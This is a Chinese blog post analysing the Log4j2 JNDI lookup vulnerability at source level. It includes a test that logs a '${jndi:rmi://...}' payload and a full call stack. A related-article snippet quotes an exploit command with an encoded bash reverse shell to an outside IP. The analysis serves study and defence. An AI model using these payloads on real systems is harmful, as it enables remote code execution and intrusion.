log4j漏洞源码分析

最新推荐文章于 2023-09-16 14:16:44 发布
最新推荐文章于 2023-09-16 14:16:44 发布
阅读量369 收藏 3
点赞数
分类专栏: # java漏洞 文章标签: log4j apache java 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/thunderclap_/article/details/129038661
版权
文章详细介绍了如何利用ApacheLog4j2的漏洞进行远程代码执行,通过分析日志框架的内部工作流程,特别是日志级别判断和lookup()方法的触发,展示了攻击者如何通过JNDI查找来执行恶意代码。关键在于log4j-core的配置和日志message中的特定格式,这可能导致严重的安全风险。
摘要由CSDN通过智能技术生成

一、环境搭建

使用Apache log4j2 <= 2.14.1进行测试
1.创建maven项目,pom.xml文件配置加入log4j依赖 
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-api</artifactId>
    <version>2.14.1</version>
</dependency>
2.添加log4j-core的依赖
3.创建log4jTest.java 
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class log4jTest {
    private static final Logger logger = LogManager.getLogger();
    public static void main(String[] args) {
        logger.error("${jndi:rmi://127.0.0.1:1099/EvalObj}");
    }
}

二、分析

重点一:判断当前日志级别是否需要记录日志  
1.AbstractLogger.java
  • 进行Logger.log()日志记录时会采用logIfEnabled()方法进行判断,返回为true才可以继续进行日志操作。这里也是漏洞能否成功触发的关键。查看isEnabled方法
  • 会判断当前传进来的level级别与系统环境的日志级别做大小比较,符合记录要求的级别才会记录。 也就是说,漏洞能否成功触发与设置的日志Level有关
如下代码基本也没有其他方法调用
org\apache\logging\log4j\spi\AbstractLogger.java
如下进入到logMessage方法后,一路调用,没有其他重要方法。
org\apache\logging\log4j\core\Logger.java
org\apache\logging\log4j\core\config\DefaultReliabilityStrategy.java
loggerConfig.java
org\apache\logging\log4j\core\config\AppenderControl.java
org\apache\logging\log4j\core\appender\AbstractOutputStreamAppender.java
对输入内容 event,进行encode加密;
org\apache\logging\log4j\core\layout\PatternLayout.java
对输入的内容进行序列化
如下会循环遍历,
org\apache\logging\log4j\core\pattern\PatternFormatter.java
循环到8的时候会记录MessagePatternConverter,主要对输入内容Message字段进行格式化;
核心代码:
org\apache\logging\log4j\core\pattern\MessagePatternConverter.java
进入到MessagePatternConverter,我们可以看到this中noLookups默认为false,意思为开启JNDI格式化功能。
  • 当进入到判断条件中,因为noLookups为false,那么!false的值为真,那么就进入到for循环里继续对log的message event进行处理,取出${}中的数据进行替换操作,从而触发后续lookup()操作
org\apache\logging\log4j\core\lookup\StrSubstitutor.java
如下进入到替换的代码部分,经过两此substitute方法。

 进入到substitute方法后,可以看到while循环,简单来说,pos为当前字符串头指针,prefixMatcher.isMatch只负责匹配 ${ 两个字符。如果匹配到就进入第二层循环匹配,原理和代码相似。如果没有匹配到}字符,pos指针就正常+1。

一旦匹配到}字符,代码就会进入第三个阶段,提取表达式的内容赋值给varNameExpr变量,并且传给bufName后交给substitute进行处理。
然后会跳到如下resolverVariable方法。会将获取到的内容作为lookup的参数进行调用。
org\apache\logging\log4j\core\lookup\StrSubstitutor.java
org\apache\logging\log4j\core\lookup\Interpolator.java
  • lookup()方法包含多种处理event的途径,从我们传入的var中根据 : 为分隔符获取到prefix,根据event的prefix选择相应的StrLookup进行处理。包括jndi、date、Java、main等。
  • 当构造的event的prefix为jndi时,则通过org.apache.logging.log4j.core.lookup.JndiLookup的lookup()方法处理,从而触发JNDI漏洞利用。
org\apache\logging\log4j\core\lookup\JndiLookup.java
最终调用jndi的地点:
javax\naming\InitialContext.java
整个调用链 
      at javax.naming.InitialContext.lookup(InitialContext.java:417)
      at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:172)
      at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:56)
      at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:221)
      at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:1110)
      at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1033)
      at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:912)
      at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:467)
      at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:132)
      at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:38)
      at org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializable(PatternLayout.java:344)
      at org.apache.logging.log4j.core.layout.PatternLayout.toText(PatternLayout.java:244)
      at org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:229)
      at org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:59)
      at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.directEncodeEvent(AbstractOutputStreamAppender.java:197)
      at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.tryAppend(AbstractOutputStreamAppender.java:190)
      at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.append(AbstractOutputStreamAppender.java:181)
      at org.apache.logging.log4j.core.config.AppenderControl.tryCallAppender(AppenderControl.java:156)
      at org.apache.logging.log4j.core.config.AppenderControl.callAppender0(AppenderControl.java:129)
      at org.apache.logging.log4j.core.config.AppenderControl.callAppenderPreventRecursion(AppenderControl.java:120)
      at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:84)
      at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:540)
      at org.apache.logging.log4j.core.config.LoggerConfig.processLogEvent(LoggerConfig.java:498)
      at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:481)
      at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:456)
      at org.apache.logging.log4j.core.config.DefaultReliabilityStrategy.log(DefaultReliabilityStrategy.java:63)
      at org.apache.logging.log4j.core.Logger.log(Logger.java:161)
      at org.apache.logging.log4j.spi.AbstractLogger.tryLogMessage(AbstractLogger.java:2205)
      at org.apache.logging.log4j.spi.AbstractLogger.logMessageTrackRecursion(AbstractLogger.java:2159)
      at org.apache.logging.log4j.spi.AbstractLogger.logMessageSafely(AbstractLogger.java:2142)
      at org.apache.logging.log4j.spi.AbstractLogger.logMessage(AbstractLogger.java:2017)
      at org.apache.logging.log4j.spi.AbstractLogger.logIfEnabled(AbstractLogger.java:1983)
      at org.apache.logging.log4j.spi.AbstractLogger.error(AbstractLogger.java:740)
      at com.huawei.log4j.log4jTest.main(log4jTest.java:10)
Thunderclap_
关注
专栏目录
最新log4j2 远程代码执行漏洞(紧急扩散)
猿小白的博客
12-10 6462
一、问题描述 在12月9日晚间出现了Apache Log4j2 远程代码执行漏洞攻击代码。该漏洞利用无需特殊配置,经多方验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。Apache Log4j2是一款流行的Java日志框架,建议广大交易所、钱包、DeFi项目方抓紧自查是否受漏洞影响,并尽快升级新版本。 Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被..
log4j2漏洞源码分析
weixin_45682070的博客
12-14 3622
前言: 上篇分析了jndi+ldap的利用,这两天新爆出来的漏洞log4j2中,结合恶意payload可执行远程恶意代码 影响范围:Apache Log4j 2.x < 2.15.0-rc2,而且利用难度低,利用要求少 紧急缓解措施(最好升级最新版本): (1) 修改jvm参数 -Dlog4j2.formatMsgNoLookups=true (2) 修改配置log4j2.formatMsgNoLookups=True (3) 将系统环境变量 FORMAT_MESSAGES_PATTERN_DISAB
Log4j漏洞复现及原理(附github源码
weixin_42478399的博客
02-15 5665
1.背景 之前在公司收到Log4j2爆出一个重大漏洞,公司有大部分应用使用到了Log4j的2.14.0以下的版本,全公司内部程序员收到消息之后,加班加点升级Log4j的版本到2.14.1(这个版本也不稳定),在此记录一下。 2.Log4j的重大漏洞 我们复现一下Log4j 2.14.0版本中出现的安全问题。首先,我们新建一个Maven项目,引入Log4j的jar包 <?xml version="1.0" encoding="UTF-8"?> <project xmlns="htt
log4j2 漏洞测试
wuwiejie的博客
12-14 3250
1、服务端 java版本 1.8 新建立目录 mkdir demo 新建文件 MyRemoteService.java 内容如下 import java.rmi.Remote; import java.rmi.RemoteException; public interface MyRemoteService extends Remote { public String sayHello() throws RemoteException; } Server.java import java.rmi.N
Apache log4j-1.2.17源码学习笔记
猿类崛起
12-05 4703
1.log4j-1.2.17介绍 断点调试和记录日志,是程序员排查问题的2个有效手段,断点调试需要对全盘代码熟门熟路,费时费力,如果代码不开源那么此种方法就不能使用,相对于断点调试,记录日志提供了另外一种更有效的排错方法,预先植入了有效的日志信息,后期只需通过配置文件即可管理日志,借助工具扫描日志文件内容可以有效的监测当前运行的系统是否运行正常。记录日志作为一个通用的重
apache开源项目源码log4j-src(高质量常用代码)
01-28
apache开源项目源码log4j-src(高质量常用代码) javaapache,log4j开源项目源码,经典代码 各种log4j的工具类源码,你会从中得到意想不到的效果! apache开源组织开发的开源项目源码,其优良的代码风格和高质量的源码是学习者难得的学习资料!
Log4j漏洞调研,源码浅解析
weixin_44029684的博客
12-17 1577
最近log4j安全漏洞突然冒了出来,用了许久slf4j的我吓得赶紧翻遍了依赖,发现自己用的依赖并没有依赖上log4j-core,长吁一口气。吃了个午饭后转念一想我又没工作,也没啥线上项目在跑,何故担心这些问题?wc,那倒腾半天不就白整了,不行,反正这漏洞java圈也挺大的,不如顺便研究一波,在未来应聘时也有聊的地方。 全文几乎都是站在巨人的肩膀上完成的,新人技术不佳,还望轻喷。
Log4j2、Fastjson、Log4j的BurpSuite插件亲测有效
06-07
Log4jLog4j2和Fastjson的安全性问题在过去曾引起广泛关注,例如Log4j2的CVE-2021-44228(也被称为Log4Shell漏洞),这是一个远程代码执行漏洞,影响了许多使用Log4j2的系统。这个插件可能就是为了检测和利用这些...
Log4J漏洞分析与SCA扫描分析
weixin_49832675的博客
05-19 920
​核弹级别的开源组件Log4J的远程执行漏洞爆出来之后,整个安全行业都忙着修复。针对此次log4j2漏洞,Scantist SCA做出快速相应,对CVE-2021-44228漏洞提供精确检测及支持。
JAVA安全--log4j漏洞研究分析
goddemon
03-12 1万+
log4j漏洞复现 复现 这里以bugku上的靶场为例进行复现 https://ctf.bugku.com/challenges/detail/id/340.html 环境配置 ①ldap服务 服务器起一个ldap服务就好了 直接执行反弹shell 即直接配置bash反弹shell命令 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84Mi4xNTYuM
apache-log4j-2.9.1jar包及源码
11-06
apache-log4j-2.9.1.jar和源码java程序中需要记录日志可以使用这个jar
Web网络安全-----Log4j高危漏洞原理及修复
qq_51690690的博客
07-27 1万+
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。提示:以下是本篇文章正文内容,下面案例可供参考。
Log4j源码分析
leilecoffee的博客
10-22 393
文章目录介绍使用源码跟踪初始化日志输出总结 介绍 Log4jApache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进...
【渗透测试】log4j漏洞复现和漏洞修复方案
最新发布
Yb528970805的博客
09-16 2003
2021年12 月 10 日凌晨,Apache 开源项目 Log4j 的远程代码执行漏洞细节被公开,由于 Log4j 的广泛使用,该漏洞一旦被攻击者利用会造成严重危害。Apache Log4j 2.x <= 2.14.1 版本均回会受到影响。Log4j 是一款开源 Java 日志记录工具。Log4j 2 是对 Log4j 的重大升级,此次漏洞的出现,正是由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。
Apache Log4j 高危漏洞缓解和修复措施
雨橙Orainge的博客
02-13 907
(3)将系统环境变量:LOG4J_FORMAT_MSG_NO_LOOKUPS 设置为 true。则表示该项目引用了受影响的版本的 Log4j2,需要尽快查看项目代码,结合实际情况进行处理。2、使用 Logback 的项目,为了保险起见,心有余力还是升级以下,以防万一。如果是 maven 管理的项目,通过升级 log4j 的版本解决漏洞。对所有使用到 Log4j 组件的项目进行升级,使用最新版本。如果检查到例如下方的结果:(2
log4j的maven依赖和使用方法
FarryNiu的博客
06-16 3413
log4j
Log4j漏洞分析
热门推荐
wbo
12-14 2万+
Log4j漏洞源码分析 这几天Log4j的问题消息满天飞,今天我们就一起来看看从源码角度看看这个漏洞是如何产生的。 大家都知道这次问题主要是由于Log4j中提供的jndi的功能。 具体涉及到的入口类是log4j-core-xxx.jar中的org.apache.logging.log4j.core.lookup.StrSubstitutor这个类。 原因是Log4j提供了Lookups的能力(关于Lookups可以点这里去看官方文档的介绍),简单来说就是变量替换的能力。 在Log4j将要输出的日
Log4j2漏洞
qq_20025777的博客
12-10 2万+
Log4j2漏洞危害:高危、远程代码执行
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Thunderclap_

点赞、关注加收藏~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值